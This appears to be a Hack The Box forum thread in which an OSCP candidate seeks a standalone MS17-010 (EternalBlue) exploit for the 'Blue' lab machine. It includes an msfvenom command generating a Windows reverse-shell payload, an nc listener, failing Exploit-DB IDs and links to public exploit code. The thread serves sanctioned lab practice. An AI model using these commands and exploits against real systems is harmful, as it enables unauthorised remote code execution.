Looking for working exploit for ms17-010 except one from metasploit

Hey guys,
I stuck a little bit with the Blue box. Exploit it with metasploit easy, but as far I going to take OSCP exam - it’s not the case. Using metasploit and meterpreter prohibit during exam. So I looking for working and standalone exploit for ms17-010.
I found a few of them using searchsploit, but they doesn’t work for Blue host.

I tried the next ones:
EDB-ID: 42031 - It says that this exploit doesn support this target
EDB-ID: 42030 - failed due to NETBIOS connection timeout
EDB-ID: 42315 - failed with impacket.smb.SessionError: STATUS_ACCESS_DENIED

Payload:
msfvenom -p windows/shell/reverse_tcp -f bin -o payload.bin LPORT=443 LHOST=

Handler:
nc -v -lp 443

Could you suggest any working for Blue host exploit, except metasploit-based?

FIX:
actual command I used to generate payload is
msfvenom -p windows/shell/reverse_tcp -f raw -o payload.bin LPORT=443 LHOST=my_tun0_ip

@flux said:
GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010

Thx, it works!
But it still use mfs as hadnler. Hope it’s allowed on exam

Thx, it works!
But it still use mfs as hadnler. Hope it’s allowed on exam
@Daeh0f What exam are you talking about?

As far as I’m aware you can use the multi/handler as often as you like, just not the meterpreter shell. In AutoBlue there is the option to choose normal cmd shell.

Another source for metasplit (32 bits) is https://raw.githubusercontent.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/master/eternalblue_doublepulsar.rb
In my experience is better to try other processes for PROCESSINJECT and use lighther payloads than meterpreter.